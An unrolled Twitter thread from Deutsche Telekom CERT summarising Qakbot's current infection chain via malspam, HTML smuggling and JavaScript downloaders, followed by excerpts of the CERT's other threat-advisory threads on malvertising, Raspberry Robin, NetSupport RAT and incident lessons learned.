Share this page!

Deutsche Telekom CERT Profile picture
Twitter logo
Mar 24 6 tweets 3 min read
#Qakbot threat actors are on fire 🔥 recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. 🧵1/6
Qakbot's main initial access vector is still through malspam campaigns ✉️. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact on the message. 🧵2/6 Image
After a short excursion to OneNote files, both main active #Qakbot botnets have currently returned to using HTML smuggling to deliver the initial attack payload. This technique has already been seen in many campaigns last year. 🧵3/6
The obama botnet currently uses a fake Onedrive message to lure victims into opening the enclosed payload, which is embedded as a base64-encoded string. The BB botnet instead uses Latin-themed texts and contains a script that will download the payload from a remote server. 🧵4/6 ImageImageImageImage
In both cases, the next stage is a JavaScript file. If opened with wscript, it triggers download and execution of the #Qakbot malware ⚠️. System administrators should consider changing the default application for .js files (and similar scripts) to prevent such attacks. 🧵5/6
#Qakbot remains to be one of the most dangerous initial access brokers and is a key ransomware enabler. Deutsche Telekom CERT and CTI will keep monitoring 🔍 the evolution of Qakbot's TTPs. 🧵6/6

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Deutsche Telekom CERT

Deutsche Telekom CERT Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @DTCERT

Deutsche Telekom CERT Profile picture
Jan 20
⚠️ WARNING: There is currently a high volume of so-called #Malvertising attacks. Threat actors are placing ads in search engines like Google to to distribute their malware payloads. 🧵1/7
Their fraudulent web pages mimic the look of legitimate download pages for common software products. For example, here is a search advertisement and the corresponding fake website pretending to offer the software GIMP. 🧵2/7
However, instead of the benign software package, information stealers and other malware 🔥 are contained in the downloaded files. Once a victim user downloads and opens such a file, sensitive information such as browser profiles, email messages and more is stolen. 🧵3/7
Read 7 tweets
Deutsche Telekom CERT Profile picture
Nov 18, 2022
#Qakbot once again had some surprises 🎁 for us this week. See below for a brief overview of what we found. 🧵 1/6
First and foremost, #Qakbot seems to have departed from their usual use of LNK files to trigger execution. Instead they now present .vbs or .js files at the root folder of the disk image 💿. 🧵 2/6 Image
This alone would not be significant, since we have observed 🔍 .js and .vbs files in Qakbots infection chain before. Now however these files also contain a signature that apparently bypasses Windows MotW / SmartScreen warnings. 🧵 3/6 Image
Read 6 tweets
Deutsche Telekom CERT Profile picture
Sep 2, 2022
Raspberry Robin is a malware that has been around for some time now and spreads via infected USB drives.
Here is what we have seen over the last 10 months. 🧵 1/12 #RaspberryRobin #malware

via @lazy_daemon
@sekoia_io and @redcanary have already published excellent technical analyses of this malware, so we won't go into more detail about it.

7095517.fs1.hubspotusercontent-na1.net/hubfs/7095517/…

redcanary.com/blog/raspberry…

🧵 2/12
Since December, 2021, we've seen several cases mostly in Hungary🇭🇺 and Germany🇩🇪 but also a few in Russia🇷🇺 and India🇮🇳.
The user always clicked the malicious link, so no automatic infection when the USB drive was plugged in. 🧵 3/12
Read 12 tweets
Deutsche Telekom CERT Profile picture
Aug 25, 2022
🚨CAUTION🚨 : Attackers send invoice themed emails impersonating german companies to deliver #NetSupport #RAT. 🐀 via @lazy_daemon 🧵1/5
Attached to the email is a HTML file which tries to download and execute malicious Javascript code. 🧵2/5
The malicious Javascript code is heavily obfuscated and executes Powershell Code to download and execute an additional Payload. 🧵3/5
Read 6 tweets
Deutsche Telekom CERT Profile picture
May 6, 2022
Here are some lessons learned from our past engagements; see it as an easy checklist on what not to do. #LessonsLearned
1) MFA (Multi-Factor-Authentication) being not fully implemented or non-existent at all
While some attackers steal MFA tokens, it is rare! 📱 #MFA
2) Bad user privilege management
Does HR really need a domain admin? 👑 #UserPrivilegeManagement
Read 10 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

Send Email!

:(